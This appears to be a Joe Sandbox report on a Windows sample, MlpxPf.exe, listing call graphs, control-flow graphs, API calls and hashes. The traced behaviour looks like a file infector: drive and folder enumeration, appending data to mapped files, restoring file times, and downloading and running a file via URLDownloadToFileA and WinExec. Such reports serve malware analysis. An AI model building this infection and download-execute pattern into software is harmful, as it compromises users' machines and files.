calls 1206->1207 1209 3521de 1207->1209 1208 352226 memcpy UnmapViewOfFile FindCloseChangeNotification 1263 351b8a 1208->1263 1209->1208 1211 35226e 1271 35185b GetSystemTimeAsFileTime srand rand srand rand 1211->1271 1213 3522ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1214 351915 3 API calls 1213->1214 1215 35231f FindCloseChangeNotification 1214->1215 1215->1178 1217 352451 CreateFileA GetFileSize 1216->1217 1225 3523d8 1216->1225 1218 352675 CloseHandle 1217->1218 1219 352480 1217->1219 1220 35267c RemoveDirectoryA 1218->1220 1219->1218 1221 352499 1219->1221 1222 352687 1220->1222 1223 351915 3 API calls 1221->1223 1222->1161 1224 3524a4 9 API calls 1223->1224 1273 35189d memset CreateProcessA 1224->1273 1225->1217 1225->1222 1228 35255c Sleep memset wsprintfA 1229 3529e2 163 API calls 1228->1229 1230 352597 memset wsprintfA Sleep 1229->1230 1231 35189d 6 API calls 1230->1231 1232 3525e4 Sleep CreateFileA 1231->1232 1233 351915 3 API calls 1232->1233 1234 352610 CloseHandle 1233->1234 1234->1220 1235 35261e 1234->1235 1235->1220 1236 352641 SetFilePointer WriteFile 1235->1236 1236->1220 1237 352667 SetEndOfFile 1236->1237 1237->1220 1239 3526b2 WaitForSingleObject 1238->1239 1240 3526a2 CreateEventA 1238->1240 1241 3526c1 lstrlen ??2@YAPAXI 1239->1241 1242 352708 1239->1242 1240->1239 1243 352736 SetEvent 1241->1243 1244 3526da lstrcpy 1241->1244 1242->1243 1245 352718 lstrcpy ??3@YAXPAX 1242->1245 1243->1161 1246 3526f1 1244->1246 1245->1246 1246->1243 1248 351e13 lstrcpy strrchr 1247->1248 1249 351e62 1247->1249 1248->1249 1250 351e40 lstrcmpiA 1248->1250 1249->1177 1249->1178 1250->1249 1251 351e52 lstrlen 1250->1251 1251->1249 1251->1250 1253 351924 SetFilePointer CreateFileMappingA MapViewOfFile 1252->1253 1254 351928 1252->1254 1253->1178 1253->1188 1255 35194f 1254->1255 1256 35192e memset GetFileTime 1254->1256 1255->1253 1257 351954 SetFileTime 1255->1257 1256->1253 1257->1253 1259 351c9c 1258->1259 1261 351c94 1258->1261 1260 351cae memset memset 1259->1260 1259->1261 1260->1261 1261->1178 1262 35185b GetSystemTimeAsFileTime srand rand srand rand 1261->1262 1262->1192 1265 351b93 1263->1265 1272 35185b GetSystemTimeAsFileTime srand rand srand rand 1265->1272 1266 351bca srand 1267 351bd8 rand 1266->1267 1268 351c08 1267->1268 1268->1267 1269 351c29 memset memcpy lstrcat 1268->1269 1269->1211 1271->1213 1272->1266 1274 3518e0 CloseHandle WaitForSingleObject 1273->1274 1275 35190c 1273->1275 1276 351907 CloseHandle 1274->1276 1277 3518fb GetExitCodeProcess 1274->1277 1275->1220 1275->1228 1276->1275 1277->1276 1287 35185b GetSystemTimeAsFileTime srand rand srand rand 1278->1287 1280 3527b5 wsprintfA CopyFileA 1281 352840 1280->1281 1282 3527de wsprintfA 1280->1282 1281->1133 1283 351973 17 API calls 1282->1283 1284 35280f 1283->1284 1285 352820 CreateFileA 1284->1285 1286 352813 DeleteFileA 1284->1286 1285->1281 1286->1285 1287->1280 1289 3511c6 AdjustTokenPrivileges 1288->1289 1290 351200 CloseHandle 1288->1290 1291 3511f7 CloseHandle 1289->1291 1292 3511f6 1289->1292 1290->1075 1291->1290 1292->1291 1294 351310 1293->1294 1295 35123f GetCurrentProcessId OpenProcess 1293->1295 1294->1073 1302 351319 1294->1302 1295->1294 1299 351262 1295->1299 1296 3512b0 VirtualAlloc 1296->1299 1300 3512b8 1296->1300 1297 3512f1 CloseHandle 1297->1294 1298 351302 VirtualFree 1297->1298 1298->1294 1299->1296 1299->1297 1299->1300 1301 351296 VirtualFree 1299->1301 1300->1297 1301->1296 1303 35134a 1302->1303 1304 35132a GetModuleHandleA GetProcAddress 1302->1304 1305 351351 memset 1303->1305 1306 351363 1303->1306 1304->1303 1304->1306 1305->1306 1306->1073 1306->1081 1307->1094 1309 351196 1308->1309 1310 3510ba 1308->1310 1310->1309 1326 35185b GetSystemTimeAsFileTime srand rand srand rand 1310->1326 1312 351118 wsprintfA wsprintfA URLDownloadToFileA 1313 3510dc 1312->1313 1314 351168 lstrlen Sleep 1312->1314 1317 351000 CreateFileA 1313->1317 1314->1310 1318 351025 GetFileSize CreateFileMappingA MapViewOfFile 1317->1318 1319 351092 WinExec lstrlen 1317->1319 1320 351057 1318->1320 1321 35107b 1318->1321 1319->1309 1319->1310 1322 351074 UnmapViewOfFile 1320->1322 1325 351061 1320->1325 1323 351087 CloseHandle 1321->1323 1324 35108d CloseHandle 1321->1324 1322->1321 1323->1324 1324->1319 1325->1322 1326->1312 1333 352361 1334 352374 1333->1334 1335 35236b UnmapViewOfFile 1333->1335 1336 352382 1334->1336 1337 352379 CloseHandle 1334->1337 1335->1334 1338 352391 1336->1338 1339 352388 CloseHandle 1336->1339 1337->1336 1339->1338 1340 356159 1341 35615f VirtualFree 1340->1341 1348 3560c7 1341->1348 1342 356198 VirtualFree 1350 3561b2 1342->1350 1343 3560d5 VirtualAlloc 1343->1348 1344 356389 VirtualProtect 1347 3563b7 1344->1347 1345 3563fc VirtualProtect 1346 356400 1345->1346 1347->1345 1349 3563e7 VirtualProtect 1347->1349 1348->1341 1348->1342 1348->1343 1349->1345 1349->1347 1350->1344 1351 3562fb 1350->1351

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
                                    callgraph 0 Function_00356734 19 Function_00356A84 0->19 24 Function_00356D00 0->24 25 Function_00356B02 0->25 1 Function_00356834 2 Function_003569B0 3 Function_003528B8 9 Function_00352692 3->9 11 Function_0035239D 3->11 44 Function_003529E2 3->44 45 Function_00351E6E 3->45 4 Function_00351638 14 Function_0035139F 4->14 15 Function_00351099 4->15 17 Function_00351718 4->17 22 Function_00351581 4->22 47 Function_003517D0 4->47 52 Function_00352C48 4->52 5 Function_003567A4 6 Function_003565A6 7 Function_00351915 8 Function_00356014 10 Function_00356012 11->7 12 Function_0035189D 11->12 11->44 13 Function_0035119F 14->13 16 Function_00351319 14->16 28 Function_0035120E 14->28 23 Function_00351000 15->23 50 Function_0035185B 15->50 34 Function_00352CF0 17->34 18 Function_00352D9B 27 Function_0035680F 19->27 36 Function_00356CF2 19->36 20 Function_00356001 31 Function_0035600A 20->31 21 Function_00351C81 22->50 23->47 24->2 24->36 43 Function_00356B63 24->43 25->43 26 Function_00352B8C 37 Function_00352B7D 26->37 51 Function_00352845 26->51 29 Function_00351D8A 30 Function_00351B8A 30->50 32 Function_00356076 53 Function_003566C8 32->53 33 Function_00351DF6 35 Function_00351973 35->50 39 Function_00356CF8 36->39 37->44 38 Function_00351AF9 38->4 40 Function_003514E1 40->4 40->38 41 Function_00352361 41->18 42 Function_00352D60 43->1 43->2 43->5 44->3 45->7 45->18 45->21 45->29 45->30 45->33 45->38 45->42 46 Function_00351C68 45->46 45->50 48 Function_0035235D 49 Function_00356159 49->53 51->9 51->11 54 Function_0035274A 51->54 52->26 52->35 53->19 53->24 53->25 54->35 54->50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 101 3529e2-352a34 memset wsprintfA 102 352abc-352b21 memset * 2 FindFirstFileA call 3528b8 memset 101->102 103 352a3a-352a86 memset lstrlen lstrcpyn strrchr 101->103 108 352b61-352b6b FindNextFileA 102->108 103->102 105 352a88-352a98 103->105 105->102 107 352a9a-352aa7 lstrcmpiA 105->107 109 352b74-352b7a 107->109 110 352aad-352aba lstrlen 107->110 111 352b23-352b2a 108->111 112 352b6d-352b6e FindClose 108->112 110->102 110->107 113 352b4c-352b5c call 3528b8 111->113 114 352b2c-352b33 111->114 112->109 113->108 114->113 115 352b35-352b4a lstrcmpiA 114->115 115->112 115->113
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                    • String ID: %s*$C:\$Documents and Settings
                                    • API String ID: 2826467728-110786608
                                    • Opcode ID: 40374975571cdce6d6912e601ce7d03124917bee32da0c507761acd654916538
                                    • Instruction ID: c0b573a07f703608cb7b63907e6744701d731f64351fefb0a6eed974e752b00d
                                    • Opcode Fuzzy Hash: 40374975571cdce6d6912e601ce7d03124917bee32da0c507761acd654916538
                                    • Instruction Fuzzy Hash: 9F4194B2404349AFD722DBA0DC49DEB77ACEB85356F04082AF945C3171E634D64C8BA2

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 216 351718-351733 GetSystemTimeAsFileTime 217 351735-351752 SHSetValueA 216->217 218 351754-351758 216->218 219 3517c6-3517cd 217->219 218->219 220 35175a-351784 SHGetValueA 218->220 220->219 221 351786-3517b3 call 352cf0 * 2 220->221 221->219 226 3517b5 221->226 227 3517b7-3517bd 226->227 228 3517bf 226->228 227->219 227->228 228->219
                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 00351729
                                    • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0035174C
                                    • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0035177C
                                    • __aulldiv.LIBCMT ref: 00351796
                                    • __aulldiv.LIBCMT ref: 003517A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: TimeValue__aulldiv$FileSystem
                                    • String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe$SOFTWARE\GTplus$Time
                                    • API String ID: 541852442-2397731975
                                    • Opcode ID: d3ddbd2587692622ed4eb5008cdb626ef852f98dbc8894e94e4e04a607f030d6
                                    • Instruction ID: dc508439260e05c53c0f08b25cb817029f38130d4efec4e0174239f6913e1c1c
                                    • Opcode Fuzzy Hash: d3ddbd2587692622ed4eb5008cdb626ef852f98dbc8894e94e4e04a607f030d6
                                    • Instruction Fuzzy Hash: 6E118671A00209BBDB129BA4CC85FEF7BBCEB44B56F108515FD01B61A1D6719B4CCB64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 229 356076-356079 230 3560e0-3560eb 229->230 231 35607b-356080 229->231 234 3560ee-3560f4 230->234 232 3560f7-3560f8 231->232 233 356082-356085 231->233 237 3560fe-356106 232->237 238 3560fa-3560fc call 3566c8 232->238 235 356087 233->235 236 3560f6 233->236 234->236 235->234 239 356089-356095 235->239 236->232 241 356155-356189 VirtualFree 237->241 242 356108-35611d 237->242 238->237 244 356097-35609f 239->244 245 3560a1-3560aa 239->245 251 35618c-356192 241->251 243 35611f-356121 242->243 247 356151-356154 243->247 248 356123 243->248 244->245 249 3560b0-3560c1 VirtualAlloc 245->249 250 3561ba-3561c8 245->250 247->241 248->247 254 356125-356128 248->254 255 3560c7-3560cf 249->255 252 356243-356251 250->252 253 3561ca-3561d7 250->253 251->255 256 356198-3561b0 VirtualFree 251->256 261 356264-35626f 252->261 262 356253 252->262 257 3561dd-3561e0 253->257 258 356134-35613b 254->258 259 35612a-35612e 254->259 255->251 260 3560d5-3560df VirtualAlloc 255->260 256->250 263 3561b2-3561b4 256->263 257->252 265 3561e2-3561f2 257->265 272 356130-356132 258->272 273 35613d-35614f 258->273 259->258 259->272 260->230 264 356271-356276 261->264 268 356255-356258 262->268 263->250 269 35627c-356289 264->269 270 356389-3563b1 VirtualProtect 264->270 271 3561f5-3561fe 265->271 268->261 274 35625a-356262 268->274 285 356292-356298 269->285 286 35628b 269->286 277 3563b7-3563ba 270->277 275 356200-356203 271->275 276 35620c-356219 271->276 272->243 273->243 274->268 279 356205-356208 275->279 280 35621b-356228 275->280 281 356238-35623f 276->281 282 3563fc-3563ff VirtualProtect 277->282 283 3563bc-3563c2 277->283 287 35622a-356236 279->287 288 35620a 279->288 280->281 281->271 290 356241 281->290 284 356400-356416 282->284 283->283 289 3563c4 283->289 291 356420-356425 284->291 292 356418-35641d 284->292 293 3562a2-3562ac 285->293 286->285 287->281 288->281 289->282 294 3563c6-3563cf 289->294 290->257 295 3562b1-3562c8 293->295 296 3562ae 293->296 297 3563d4-3563d8 294->297 298 3563d1 294->298 299 356373-356384 295->299 300 3562ce-3562d4 295->300 296->295 301 3563dd-3563e1 297->301 302 3563da 297->302 298->297 299->264 305 3562d6-3562d9 300->305 306 3562da-3562f1 300->306 303 3563e7-3563fa VirtualProtect 301->303 304 3563e3 301->304 302->301 303->277 303->282 304->303 305->306 308 356365-35636e 306->308 309 3562f3-3562f9 306->309 308->293 310 356314-356326 309->310 311 3562fb-35630f 309->311 313 35634c-356360 310->313 314 356328-35634a 310->314 312 356426-3564a9 311->312 323 356519-35651c 312->323 324 3564ab-3564c0 312->324 313->312 314->308 325 356583-356587 323->325 326 35651d-35651e 323->326 330 356535-356537 324->330 331 3564c2 324->331 328 356588-35658b 325->328 329 356522-356533 326->329 332 3565a1-3565a3 328->332 333 35658d-35658f 328->333 329->330 334 356539 330->334 335 35659a 330->335 336 3564c5-3564cd 331->336 337 3564f8 331->337 338 356591-356593 333->338 339 3565b4 334->339 340 35653b-356541 334->340 341 35659b-35659d 335->341 342 356542-356545 336->342 343 3564cf-3564d4 336->343 344 35656c-35656f 337->344 345 3564fa-3564fe 337->345 338->341 346 356595 338->346 351 3565be-356608 339->351 340->342 341->338 347 35659f 341->347 348 35654d-356550 342->348 349 356517-356518 343->349 350 3564d6-3564d9 343->350 352 356572 344->352 345->352 353 356500 345->353 346->335 347->328 348->351 354 356552-356556 348->354 349->323 350->348 355 3564db-3564f5 350->355 356 356573-356576 352->356 353->329 357 356502 353->357 358 356578-35657f 354->358 360 356558-356569 354->360 355->337 356->358 357->356 359 356504-356513 357->359 358->325 359->330 362 356515 359->362 360->344 362->349
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 003560BE
                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 003560DF
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00356189
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 003561A5
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: b2d83c07e2c73f132056d7811d2e983a31bb42f5d830739293ebf7aa577ba0d4
                                    • Instruction ID: 802cab497e19043d78b00d71d4a77ae1e3f29cd6bc634c5dfcade293457f2705
                                    • Opcode Fuzzy Hash: b2d83c07e2c73f132056d7811d2e983a31bb42f5d830739293ebf7aa577ba0d4
                                    • Instruction Fuzzy Hash: 801223B25087848FDB328F24CC56FEA7BB4EF02311F99495DDC868B5B2D674A908C751

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 364 352b8c-352bc6 memset GetLogicalDriveStringsA 365 352c09-352c28 WaitForMultipleObjects 364->365 366 352bc8-352bcc 364->366 367 352c3c-352c45 365->367 368 352c2a-352c3a CreateThread 365->368 369 352bce-352bd0 366->369 370 352bfa-352c07 lstrlen 366->370 368->367 369->370 371 352bd2-352bdc GetDriveTypeA 369->371 370->365 370->366 371->370 372 352bde-352be1 371->372 372->370 373 352be3-352bf6 CreateThread 372->373 373->370
                                    APIs
                                    • memset.MSVCRT ref: 00352BA6
                                    • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00352BB4
                                    • GetDriveTypeA.KERNEL32(?), ref: 00352BD3
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00352BEE
                                    • lstrlen.KERNEL32(?), ref: 00352BFB
                                    • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00352C16
                                    • CreateThread.KERNEL32(00000000,00000000,00352845,00000000,00000000,00000000), ref: 00352C3A
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                    • String ID:
                                    • API String ID: 1073171358-0
                                    • Opcode ID: d17107860b3bd752f8bda0624bc4a5f40126622ba78c60fe4e5f46caa94b6af0
                                    • Instruction ID: 33a481edc2b6c8787b0e5a8d9cc8027c4b374561f36ac424765dacdc66787830
                                    • Opcode Fuzzy Hash: d17107860b3bd752f8bda0624bc4a5f40126622ba78c60fe4e5f46caa94b6af0
                                    • Instruction Fuzzy Hash: 0821C3B180034CAFE7229F64AC84DAF7B6DFB0635AF150125FC42A3171D7208D4ACB60

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 351e6e-351e95 call 352d60 3 351e97 call 351d8a 0->3 4 351e9c-351eaa call 351df6 0->4 3->4 8 351eb0-351ed9 SetFileAttributesA CreateFileA 4->8 9 352332 4->9 8->9 10 351edf-351f28 call 351915 SetFilePointer CreateFileMappingA MapViewOfFile 8->10 11 352338-35233b 9->11 10->9 18 351f2e-351f39 10->18 13 352346-352349 11->13 14 35233d-352340 UnmapViewOfFile 11->14 16 352350-352354 13->16 17 35234b-35234e FindCloseChangeNotification 13->17 14->13 19 352356-35235b CloseHandle 16->19 20 352391-35239a call 352d9b 16->20 17->16 18->9 22 351f3f-351f56 18->22 19->20 22->9 24 351f5c-351f64 22->24 24->9 25 351f6a-351f70 24->25 25->9 26 351f76-351f87 call 351c81 25->26 26->9 29 351f8d-351fa7 call 35185b call 351c81 26->29 29->9 34 351fad-351fb4 29->34 35 352024-352045 34->35 36 351fb6-351fc5 call 351af9 34->36 35->9 37 35204b-35204e 35->37 36->35 44 351fc7-351fd2 36->44 39 352070-3520f4 call 351af9 * 2 call 351c68 * 2 memset * 2 37->39 40 352050-352053 37->40 62 3520f5-3520fe 39->62 42 352056-35205a 40->42 42->39 45 35205c-352061 42->45 44->9 47 351fd8-351fe7 44->47 45->9 48 352067-35206e 45->48 50 351fef-352006 call 351af9 47->50 51 351fe9-351fec 47->51 48->42 57 352013-35201e FlushViewOfFile 50->57 58 352008-35200e call 351c68 50->58 51->50 57->35 58->57 63 352130-352139 62->63 64 352100-352114 62->64 67 35213c-352142 63->67 65 352116-35212a 64->65 66 35212d-35212e 64->66 65->66 66->62 68 352144-352150 67->68 69 35215c 67->69 70 352157-35215a 68->70 71 352152-352154 68->71 72 35215f-352162 69->72 70->67 71->70 73 352164-352171 72->73 74 352181-352184 72->74 75 352177-35217e 73->75 76 35232a-35232d 73->76 77 352186 74->77 78 35218d-3521ba call 351c68 74->78 75->74 76->72 77->78 81 3521d3-35220b call 351c81 call 351c68 78->81 82 3521bc-3521d0 call 351c68 78->82 89 35220d-352218 call 351c68 81->89 90 35221b-35221e 81->90 82->81 89->90 92 352226-352328 memcpy UnmapViewOfFile FindCloseChangeNotification call 351b8a call 35185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 351915 FindCloseChangeNotification 90->92 93 352220-352223 90->93 92->11 93->92
                                    APIs
                                    • SetFileAttributesA.KERNEL32(?,00000080,?,003532B0,00000164,00352986,?), ref: 00351EB9
                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00351ECD
                                    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00351EF3
                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00351F07
                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00351F1D
                                    • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0035201E
                                    • memset.MSVCRT ref: 003520D8
                                    • memset.MSVCRT ref: 003520EA
                                    • memcpy.MSVCRT ref: 0035222D
                                    • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00352238
                                    • FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0035224A
                                    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003522C6
                                    • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003522CB
                                    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003522DD
                                    • WriteFile.KERNEL32(000000FF,00354008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003522F7
                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0035230D
                                    • FindCloseChangeNotification.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00352322
                                    • UnmapViewOfFile.KERNEL32(?,?,003532B0,00000164,00352986,?), ref: 00352340
                                    • FindCloseChangeNotification.KERNEL32(?,?,003532B0,00000164,00352986,?), ref: 0035234E
                                    • CloseHandle.KERNEL32(000000FF,?,003532B0,00000164,00352986,?), ref: 00352359
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: File$CloseView$ChangeFindNotificationPointer$CreateUnmapWritememset$AttributesFlushHandleMappingmemcpy
                                    • String ID: .@5$5@5$<@5$C@5$m@5
                                    • API String ID: 307705342-476672356
                                    • Opcode ID: 98baf6affbdd1b943d95537366400a3774d9938ecc3f698d4dd9828131e29595
                                    • Instruction ID: dc18220e907a35f934e58e01ad3d2638a585ca30164b6f9457ded3734c15c252
                                    • Opcode Fuzzy Hash: 98baf6affbdd1b943d95537366400a3774d9938ecc3f698d4dd9828131e29595
                                    • Instruction Fuzzy Hash: AFF14B75900608EFCB26DFA4DC81EAEBBB5FF09316F104529E909A76A1D730AD85CF50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 117 351973-35199a PathFileExistsA 118 351ac7-351acc 117->118 119 3519a0-3519aa 117->119 121 351ad0-351ad5 118->121 122 351ace 118->122 120 3519af-3519c2 CreateFileA 119->120 123 3519c4-3519d3 Sleep 120->123 124 351a28-351a36 GetFileSize 120->124 125 351ad7-351ad9 121->125 126 351af0-351af6 121->126 122->121 123->120 127 3519d5-351a0b call 35185b wsprintfA CopyFileA 123->127 128 351a87-351a8b 124->128 129 351a38-351a3b 124->129 125->126 127->124 141 351a0d-351a26 CreateFileA 127->141 130 351a96-351a9a 128->130 131 351a8d-351a90 CloseHandle 128->131 129->128 133 351a3d-351a51 VirtualAlloc 129->133 134 351aad-351ab1 130->134 135 351a9c 130->135 131->130 133->128 137 351a53-351a57 133->137 139 351ab3-351ab6 134->139 140 351adb-351ae0 134->140 138 351aa0-351aa7 DeleteFileA 135->138 142 351a80 137->142 143 351a59-351a6d ReadFile 137->143 138->134 139->118 144 351ab8-351ac1 VirtualFree 139->144 146 351ae7-351aec 140->146 147 351ae2-351ae5 140->147 141->124 145 351a9e 141->145 142->128 143->128 148 351a6f-351a7e 143->148 144->118 145->138 146->126 149 351aee 146->149 147->146 148->142 148->143 149->126
                                    APIs
                                    • PathFileExistsA.SHLWAPI(\N5`N5,00000000,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 00351992
                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003519BA
                                    • Sleep.KERNEL32(00000064), ref: 003519C6
                                    • wsprintfA.USER32 ref: 003519EC
                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 00351A00
                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00351A1E
                                    • GetFileSize.KERNEL32(?,00000000), ref: 00351A2C
                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00351A46
                                    • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00351A65
                                    • CloseHandle.KERNEL32(000000FF), ref: 00351A90
                                    • DeleteFileA.KERNEL32(?), ref: 00351AA7
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00351AC1
                                    Strings
                                    • %s%.8X.data, xrefs: 003519E6
                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 003519DB
                                    • \N5`N5, xrefs: 00351980
                                    • C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 0035197C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
                                    • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\MlpxPf.exe$\N5`N5
                                    • API String ID: 716042067-2946605781
                                    • Opcode ID: 2296dca8266f75ac1ae05514261ec80d3076c8dafd2ee583bd40a49d7a8cba39
                                    • Instruction ID: f6e4748725419ae1059a73267c10d2382e5235f943860cdcc3b58d3f16e4d5e5
                                    • Opcode Fuzzy Hash: 2296dca8266f75ac1ae05514261ec80d3076c8dafd2ee583bd40a49d7a8cba39
                                    • Instruction Fuzzy Hash: 29514F71901219EFCB139F98CC84EAEBBBCFB04356F114569F916E61A0C3709E48CB90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
